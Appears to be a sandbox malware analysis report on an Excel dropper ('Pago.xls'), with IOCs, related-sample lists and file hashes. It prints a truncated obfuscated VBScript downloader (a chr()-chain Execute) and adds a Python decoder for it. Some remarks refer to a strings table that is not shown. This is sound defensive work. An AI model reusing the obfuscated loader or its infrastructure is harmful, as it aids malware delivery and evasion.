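Run on the table, the 27 strings reduce to three certificate URIs and nine candidates. The longest www.stipamana.com path subsumes fifteen of the shorter fragments; the survivors that differ from it only in their last character (…docjfsdfknN, …docjfsdfknds$, …docjq, …styhagdhgttjwtqk) are most plausibly partially overwritten copies of the same string rather than separate paths, so the IOC worth recording is the full path together with the host, and the .crl and CPS entries should not be blocked or hunted for.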
IP: 87.121.86.205
Domain: www.stipamana.com
Country: Bulgaria
ASN: 34577
ASN Name: SKATTV-ASBG
Malicious: false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1575112
Start date and time: 2024-12-14 13:50:53 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Pago.xls
Detection: MAL
Classification: mal100.troj.expl.evad.winXLS@10/17@4/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 65%
• Number of executed functions: 20
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .xls
• Found Word, Excel, PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time: 07:51:54
Type: API Interceptor
Description: 48x Sleep call for process: wscript.exe modified

Time: 07:53:02
Type: API Interceptor
Description: 3x Sleep call for process: NXRWIG.exe modified
Match: 87.121.86.205 (IP)
Associated samples (sample name: detection, threat name):
• yIla7SeJ6r.doc: malicious, XenoRAT
• Outstanding_Payment.vbs: malicious, Unknown
Match: www.stipamana.com (domain)
Associated samples (sample name: detection, threat name; context = IP the domain resolved to in that analysis):
• Estado.de.cuenta.xls: malicious, AveMaria, UACMe (context: 94.156.167.55)
• tqkdMdv2zO.doc: malicious, XenoRAT (context: 94.156.167.57)
• gMqBZfJ5Mq.exe: malicious, Lokibot (context: 94.156.167.55)
• Estado.de.cuenta.xls: malicious, AveMaria, UACMe (context: 94.156.167.55)
• Estado.de.cuenta.xls: malicious, AveMaria, UACMe (context: 94.156.167.55)
• Estado.de.cuenta.xls: malicious, AveMaria, UACMe (context: 94.156.167.55)
• Estado_de_cuenta.xls: malicious, AveMaria, UACMe (context: 94.156.167.57)
• plb2ptcqcI.doc: malicious, XenoRAT (context: 94.156.167.57)
• TRANSFERENCIA COMPROBANTES.lnk: malicious, XenoRAT (context: 94.156.167.57)
• TRANSFERENCIA COMPROBANTES.lnk: malicious, Unknown (context: 94.156.167.57)
Note: in every earlier analysis the domain resolved to 94.156.167.55 or 94.156.167.57, whereas in this analysis it resolved to 87.121.86.205, so the domain is the stable indicator and the IP is not.
Match: SKATTV-ASBG (ASN)
Associated samples (sample name or URL: detection, threat name; context = IP in this ASN contacted by that sample):
• yIla7SeJ6r.doc: malicious, XenoRAT (context: 87.121.86.205)
• Outstanding_Payment.vbs: malicious, Unknown (context: 87.121.86.205)
• Comprobante de pago.xlam.xlsx: malicious, AgentTesla (context: 87.121.86.105)
• RHxJqGoGFB.exe: malicious, Sality (context: 94.156.127.59)
• yVVZdG2NJX.exe: malicious, GuLoader (context: 87.121.86.8)
• https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzub: malicious, Unknown (context: 87.121.86.72)
• http://cl4ycra.hgzcbqsqumhkfshql.com/kxosbfkve: malicious, Unknown (context: 87.121.86.72)
• [EXTERNAL] Oakville shared ''o_akville_853473074_21.11.2024''.eml: malicious, Unknown (context: 87.121.86.72)
• o4QEzeCniw.exe: malicious, Unknown (context: 87.120.237.130)
• Payment Order #00004647.exe: malicious, XWorm (context: 87.121.86.8)
Match: 05af1f5ca1b87cc9cc9b25185115607d (dropped file)
Associated samples (sample name: detection, threat name; context = IP contacted by that sample):
• NB PO-104105107108.xls: malicious, Unknown (context: 87.121.86.205)
• rcNDmdah2W.doc: malicious, Unknown (context: 87.121.86.205)
• SLNA_Updated_Medical_Grant_Application(1).docx: malicious, Unknown (context: 87.121.86.205)
• CMR ART009.docx: malicious, Unknown (context: 87.121.86.205)
• Cot90012ARCACONTAL.xls: malicious, Remcos (context: 87.121.86.205)
• Euro confirmation Sp.xls: malicious, Unknown (context: 87.121.86.205)
• 510005940.docx.doc: malicious, Unknown (context: 87.121.86.205)
• invoice09850.xls: malicious, Remcos (context: 87.121.86.205)
• Invoice A037.xls: malicious, Unknown (context: 87.121.86.205)
• Request for quote.doc: malicious, Snake Keylogger (context: 87.121.86.205)

Match: 7dcce5b76c8b17472d024758970a406b (dropped file)
Associated samples (sample name: detection, threat name; context = IP contacted by that sample):
• NB PO-104105107108.xls: malicious, Unknown (context: 87.121.86.205)
• PyrNUtAUkw.docx: malicious, Unknown (context: 87.121.86.205)
• SLNA_Updated_Medical_Grant_Application(1).docx: malicious, Unknown (context: 87.121.86.205)
• CMR ART009.docx: malicious, Unknown (context: 87.121.86.205)
• Cot90012ARCACONTAL.xls: malicious, Remcos (context: 87.121.86.205)
• Estado.de.cuenta.xls: malicious, AveMaria, UACMe (context: 87.121.86.205)
• SOA USD67,353.35.xla.xlsx: malicious, Unknown (context: 87.121.86.205)
• Euro confirmation Sp.xls: malicious, Unknown (context: 87.121.86.205)
• 510005940.docx.doc: malicious, Unknown (context: 87.121.86.205)
• Document.xla: malicious, Unknown (context: 87.121.86.205)
                                              No context
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: ASCII text, with very long lines (10230), with CRLF line terminators
Category: dropped
Size (bytes): 10232
Entropy (8bit): 4.211783367688683
Encrypted: false
SSDEEP: 96:K2uOO/DTYHkGihu1BAbYm3ts/chhS3y+KdkZ91eJ/GhsSwI1taYjFCWCtcrQbAyj:ADDSTuO6hOu271OrhI1kyCccREU
MD5: 6990D9879DEA656A60AFCA23413F9FDF
SHA1: 07BF9A3E010A8B086743428049928BE6025F7441
SHA-256: EF0B46E9141A7691C1C9E2F882801BB7B42758D40E6B29D894E67D5F09270724
SHA-512: A1012437567F38A7CE664FDE76E6DA04B5FBC704829180B4AE0E0F5898C22D4207223D81CD6D38A3AEDE09156D384FF6A6B1C7E7D511A5E18E0977DEF4E62FAA
Malicious: true
Reputation: low
                                              Preview:Execute(chr(6225/75)& chr(154-53)& chr(10440/90)& chr(127-95)& chr(73+38)& chr(169-71)& chr(13+93)& chr(25+62)& chr(1260/12)& chr(36+74)& chr(145-73)& chr(66+50)& chr(61+55)& chr(206-94)& chr(59-27)& chr(100-39)& chr(99-67)& chr(85-18)& chr(100+14)& chr(8181/81)& chr(3298/34)& chr(4*29)& chr(185-84)& chr(43+36)& chr(4606/47)& chr(21+85)& chr(6+95)& chr(192-93)& chr(2*58)& chr(12+28)& chr(2312/68)& chr(101-14)& chr(182-77)& chr(2750/25)& chr(1944/27)& chr(10092/87)& chr(177-61)& chr(94+18)& chr(12+34)& chr(1392/16)& chr(37+68)& chr(198-88)& chr(106-34)& chr(10672/92)& chr(54+62)& chr(1008/9)& chr(10+72)& chr(71+30)& chr(147-34)& chr(28+89)& chr(4646/46)& chr(115*1)& chr(69+47)& chr(109-63)& chr(-36+89)& chr(3818/83)& chr(107-58)& chr(136/4)& chr(3+38)& chr(-33+43)& chr(12+73)& chr(21+61)& chr(4332/57)& chr(1856/58)& chr(105-44)& chr(131-99)& chr(-59+93)& chr(35+69)& chr(86+30)& chr(164-48)& chr(81+31)& chr(103+12)& chr(2726/47)& chr(2773/59)& chr(13+34)& chr(54+65)& chr(98+21)& chr(65+5
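The preview of this dropped script is a single VBScript Execute() whose argument is a chain of chr() calls with arithmetic arguments, so no readable keyword appears in the file and signatures on the script body have nothing to match. The following Python script is an added example, not code from the report or from the sample: it evaluates each chr() expression with a restricted AST walker instead of eval() and rebuilds the concatenated string. Its input is the preview exactly as printed above, which ends mid-expression, so the final incomplete chr( is ignored rather than guessed.

```python
"""Decode a VBScript chr(expr)& chr(expr)& ... chain into plaintext.

Added example (not from the report or the sample). PREVIEW is the dropped
script's preview as printed in the report; it is truncated after "chr(65+5".
"""
import ast
import operator
import re

PREVIEW = (
    "Execute(chr(6225/75)& chr(154-53)& chr(10440/90)& chr(127-95)& chr(73+38)& "
    "chr(169-71)& chr(13+93)& chr(25+62)& chr(1260/12)& chr(36+74)& chr(145-73)& "
    "chr(66+50)& chr(61+55)& chr(206-94)& chr(59-27)& chr(100-39)& chr(99-67)& "
    "chr(85-18)& chr(100+14)& chr(8181/81)& chr(3298/34)& chr(4*29)& chr(185-84)& "
    "chr(43+36)& chr(4606/47)& chr(21+85)& chr(6+95)& chr(192-93)& chr(2*58)& "
    "chr(12+28)& chr(2312/68)& chr(101-14)& chr(182-77)& chr(2750/25)& chr(1944/27)& "
    "chr(10092/87)& chr(177-61)& chr(94+18)& chr(12+34)& chr(1392/16)& chr(37+68)& "
    "chr(198-88)& chr(106-34)& chr(10672/92)& chr(54+62)& chr(1008/9)& chr(10+72)& "
    "chr(71+30)& chr(147-34)& chr(28+89)& chr(4646/46)& chr(115*1)& chr(69+47)& "
    "chr(109-63)& chr(-36+89)& chr(3818/83)& chr(107-58)& chr(136/4)& chr(3+38)& "
    "chr(-33+43)& chr(12+73)& chr(21+61)& chr(4332/57)& chr(1856/58)& chr(105-44)& "
    "chr(131-99)& chr(-59+93)& chr(35+69)& chr(86+30)& chr(164-48)& chr(81+31)& "
    "chr(103+12)& chr(2726/47)& chr(2773/59)& chr(13+34)& chr(54+65)& chr(98+21)& "
    "chr(65+5"
)

# Only the four binary operators and unary sign that the sample uses are allowed;
# anything else (names, calls, attributes) raises instead of being executed.
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def safe_eval(expr):
    """Evaluate integer arithmetic such as '6225/75' or '-36+89' without eval()."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, (ast.USub, ast.UAdd)):
            value = walk(node.operand)
            return -value if isinstance(node.op, ast.USub) else value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"unsupported syntax in {expr!r}")
    return walk(ast.parse(expr.strip(), mode="eval"))


# One chr( ... ) call without nested parentheses; an unterminated call at the
# end of a truncated preview is simply not matched.
_CHR = re.compile(r"chr\(([^()]*)\)", re.IGNORECASE)


def decode_chr_chain(text):
    """Return the string the chr() chain builds.

    VBScript's Chr() accepts a float such as 83.0 from '/', so each value is
    rounded to the nearest integer code point.
    """
    return "".join(chr(int(round(safe_eval(expr)))) for expr in _CHR.findall(text))


_PROGID = re.compile(r'CreateObject\("([^"]+)"\)', re.IGNORECASE)


def com_progids(script):
    """COM ProgIDs the decoded script instantiates (the first thing worth triaging)."""
    return _PROGID.findall(script)


if __name__ == "__main__":
    decoded = decode_chr_chain(PREVIEW)
    print(decoded)
    print("COM objects:", com_progids(decoded))
```

The 77 complete expressions in the preview decode to `Set objWinHttp = CreateObject("WinHttp.WinHttpRequest.5.1")` followed by the beginning of `URL = "https://ww`, i.e. the script builds an HTTP client and starts assigning the download URL, consistent with the www.stipamana.com strings recovered from wscript.exe memory above. The rest of the 10 KB file is not in the preview, so the decoder shows only what the report shows; running it on the full dropped file would yield the complete second-stage logic.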
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 395776
Entropy (8bit): 6.292758889650956
Encrypted: false
SSDEEP: 6144:y3w+J2qEjOEDBOOloZON3RZDI6Yv3bK1UAnkPrI5SM3UdjnldjfzaYHapYd:yR2q0DMODN3RZDIZ3bYkPrIBEdTa6
MD5: 3871A95491C97785A2CBA0C068A9ED4E
SHA1: B304DD40686538DEB24184729623D572DEEC57FB
SHA-256: 51D0B96C358A0FE55BB6A60970CEF3EFA0EC20CDAB01B4DC03DF4928D6A585BD
SHA-512: 1E2200B86CB9AA7467B19E31CAA148C6A8086F97AC8E326F3CEF79629BBEA50AE8070B8A6BCAC24AD55049E64DABF8C73B75284D0C14AE4EC224705E6137DF5C
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[g..............P.................. ........@.. .......................`............`.....................................O.... .......................@......d................................................ ............... ..H............text...4.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H............e......D......H...........................................*....(....*2.....(.....*.s.........s.........s.........s.........s.........*.0...........~....o........8........*....0...........~....o........8........*....0...........~....o........8........*....0...........~....o........8........*....0...........~....o........8........*....0....................9..............o....8.... ............9....~...............9....~.........(....o............9.... .........%..
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BB7DF04E1B0A2570657527A7E108AE23
SHA1: 5188431849B4613152FD7BDBA6A3FF0A4FD6424B
SHA-256: C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
SHA-512: 768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
Malicious: false
Reputation: high, very likely benign file
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Reputation: high, very likely benign file
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\wscript.exe
File Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Template: Normal.dotm, Last Saved By: oplup, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sat Dec 14 08:47:00 2024, Last Saved Time/Date: Sat Dec 14 08:47:00 2024, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0
Category: dropped
Size (bytes): 37888
Entropy (8bit): 4.182696331742761
Encrypted: false
SSDEEP: 384:wRWpiSY5Ugbjr+6dl1cf/tr/j9fS60jkf4R:N72Oftld58
MD5: B46F63CCDDDF1968E5B65F0FFBE9246B
SHA1: 37A4EC154E6FA0D4D88AB57F3B8FEDD364D27F78
SHA-256: F28940AC5F587D2C947EC5DE426113B01FC6C292C0376B727F13FB1AF40DBB33
SHA-512: 93A2BC0E715849FB53EE5A168030FE6314A789F6203B144775230B0AFACF46FB3A98B84EBAD92831076EF1EBEA453D30114C4A4856D2FBE0497020D5AF6B4068
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:......................>.......................'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................_.............................bjbj,E,E..........................N/..N/....................................................................................6.......6...........................................................................................................!...f.......................................................................................................................$...........9...>.........................................................................
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.4797606462020303
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyRyaSiuW3hWRUbilfln:vdsCkWta5RJhhbidl
MD5: CA9570952A5F48F847628233AB5AB2D4
SHA1: 109750BB54BEFE801619BFE33AFE1BA2DCC152AB
SHA-256: 35BC7B00A750EC0D7066E16C7A8021E46EB3E4937D83FC67F47AF3AEC99135EC
SHA-512: 0749A18934BD44BB05B250FF0FBC8F4630B0767F650CEDFCDF8C44E6E1EE8E3F250AB254F3F622F88A61EBA6FAA7F2138F6507441ACC4057652B93C2B0C50EE9
Malicious: false
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):32768
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BB7DF04E1B0A2570657527A7E108AE23
                                              SHA1:5188431849B4613152FD7BDBA6A3FF0A4FD6424B
                                              SHA-256:C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
                                              SHA-512:768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
                                              Malicious:false
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):28672
                                              Entropy (8bit):3.635493283618473
                                              Encrypted:false
                                              SSDEEP:768:Jj+o8xEtjPOtioVjDGUU1qfDlaGGx+cL2QnAK0PtPll9UQ:YVxEtjPOtioVjDGUU1qfDlaGGx+cL2Qa
                                              MD5:E22A88409098D61E82C185FC9EB527FB
                                              SHA1:1C9849575E825F2271CE800E958E1598BDDAFAA1
                                              SHA-256:E8E55B0D83E961AF10E2C6ABFD01DDB54AE0AAA8565A61B96FADF95C3BB237A0
                                              SHA-512:58DA0F9989A0DEC7F78188CB84163B015425C6812DB75D8208719167D56BABE97EDDC6B06C2C296EB1128EC140F182EC6A29B57C6C1091BF87C5A8FF3794B248
                                              Malicious:false
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.4797606462020303
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyRyaSiuW3hWRUbilfln:vdsCkWta5RJhhbidl
                                              MD5:CA9570952A5F48F847628233AB5AB2D4
                                              SHA1:109750BB54BEFE801619BFE33AFE1BA2DCC152AB
                                              SHA-256:35BC7B00A750EC0D7066E16C7A8021E46EB3E4937D83FC67F47AF3AEC99135EC
                                              SHA-512:0749A18934BD44BB05B250FF0FBC8F4630B0767F650CEDFCDF8C44E6E1EE8E3F250AB254F3F622F88A61EBA6FAA7F2138F6507441ACC4057652B93C2B0C50EE9
                                              Malicious:false
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):395776
                                              Entropy (8bit):6.292758889650956
                                              Encrypted:false
                                              SSDEEP:6144:y3w+J2qEjOEDBOOloZON3RZDI6Yv3bK1UAnkPrI5SM3UdjnldjfzaYHapYd:yR2q0DMODN3RZDIZ3bYkPrIBEdTa6
                                              MD5:3871A95491C97785A2CBA0C068A9ED4E
                                              SHA1:B304DD40686538DEB24184729623D572DEEC57FB
                                              SHA-256:51D0B96C358A0FE55BB6A60970CEF3EFA0EC20CDAB01B4DC03DF4928D6A585BD
                                              SHA-512:1E2200B86CB9AA7467B19E31CAA148C6A8086F97AC8E326F3CEF79629BBEA50AE8070B8A6BCAC24AD55049E64DABF8C73B75284D0C14AE4EC224705E6137DF5C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:ASCII text, with very long lines (10230), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):10232
                                              Entropy (8bit):4.211783367688683
                                              Encrypted:false
                                              SSDEEP:96:K2uOO/DTYHkGihu1BAbYm3ts/chhS3y+KdkZ91eJ/GhsSwI1taYjFCWCtcrQbAyj:ADDSTuO6hOu271OrhI1kyCccREU
                                              MD5:6990D9879DEA656A60AFCA23413F9FDF
                                              SHA1:07BF9A3E010A8B086743428049928BE6025F7441
                                              SHA-256:EF0B46E9141A7691C1C9E2F882801BB7B42758D40E6B29D894E67D5F09270724
                                              SHA-512:A1012437567F38A7CE664FDE76E6DA04B5FBC704829180B4AE0E0F5898C22D4207223D81CD6D38A3AEDE09156D384FF6A6B1C7E7D511A5E18E0977DEF4E62FAA
                                              Malicious:true
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Last Saved By: user, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Dec 6 20:43:11 2018, Last Saved Time/Date: Sat Dec 14 12:52:28 2024, Security: 0
                                              Category:dropped
                                              Size (bytes):100864
                                              Entropy (8bit):5.278104725427062
                                              Encrypted:false
                                              SSDEEP:3072:cVxEtjPOtioVjDGUU1qfDlaGGx+cL2QnA7fpQJVD+G1RSc:wxEtjPOtioVjDGUU1qfDlavx+W2QnAdB
                                              MD5:F869C2BD5E1E73C991B9BF270743B0FF
                                              SHA1:7E59BA05230AE40342294DA217780F5D62FC730A
                                              SHA-256:9FCFD37138EF309C4524D3FB73CC51031DB033C9794AFD2A0A215FCACC79B2BD
                                              SHA-512:6431DD71ED838BB162EE43A8B461EEB90B3DFC0DAE7D374D92962189DD5D055C9DA5A92F2B4D41994F0B22B6DC8C617122534EED8D377C8E80043E525D2C85AA
                                              Malicious:false
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Last Saved By: oplup, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Dec 6 20:43:11 2018, Last Saved Time/Date: Sat Dec 14 09:17:33 2024, Security: 0
                                              Category:dropped
                                              Size (bytes):60416
                                              Entropy (8bit):5.694040623144282
                                              Encrypted:false
                                              SSDEEP:1536:1VxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAxPdV:1VxEtjPOtioVjDGUU1qfDlaGGx+cL2QQ
                                              MD5:61A52F73C822EF134C29BE7AEB040356
                                              SHA1:A956610F417D21DDF35198D952F2191C92EAB470
                                              SHA-256:F5A2B785F877A2C91F56B70088EE7C26CD3A74FA636C02C3289C0C7F1F4064C5
                                              SHA-512:2A1BECD6C641BD62E48081E0FB103CD4494B22AB72BA2E3112DF437E2C850EC376957B1C2950988B0A646396B9C7C81278E6BCC0BCBA7D92D6BBEDF1D94058E7
                                              Malicious:false
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Last Saved By: oplup, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Dec 6 20:43:11 2018, Last Saved Time/Date: Sat Dec 14 09:17:33 2024, Security: 0
                                              Category:dropped
                                              Size (bytes):60416
                                              Entropy (8bit):5.694040623144282
                                              Encrypted:false
                                              SSDEEP:1536:1VxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAxPdV:1VxEtjPOtioVjDGUU1qfDlaGGx+cL2QQ
                                              MD5:61A52F73C822EF134C29BE7AEB040356
                                              SHA1:A956610F417D21DDF35198D952F2191C92EAB470
                                              SHA-256:F5A2B785F877A2C91F56B70088EE7C26CD3A74FA636C02C3289C0C7F1F4064C5
                                              SHA-512:2A1BECD6C641BD62E48081E0FB103CD4494B22AB72BA2E3112DF437E2C850EC376957B1C2950988B0A646396B9C7C81278E6BCC0BCBA7D92D6BBEDF1D94058E7
                                              Malicious:true
                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: admin, Last Saved By: oplup, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Dec 6 20:43:11 2018, Last Saved Time/Date: Sat Dec 14 09:17:33 2024, Security: 0
                                              Entropy (8bit):5.810117189295705
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 47.99%
                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
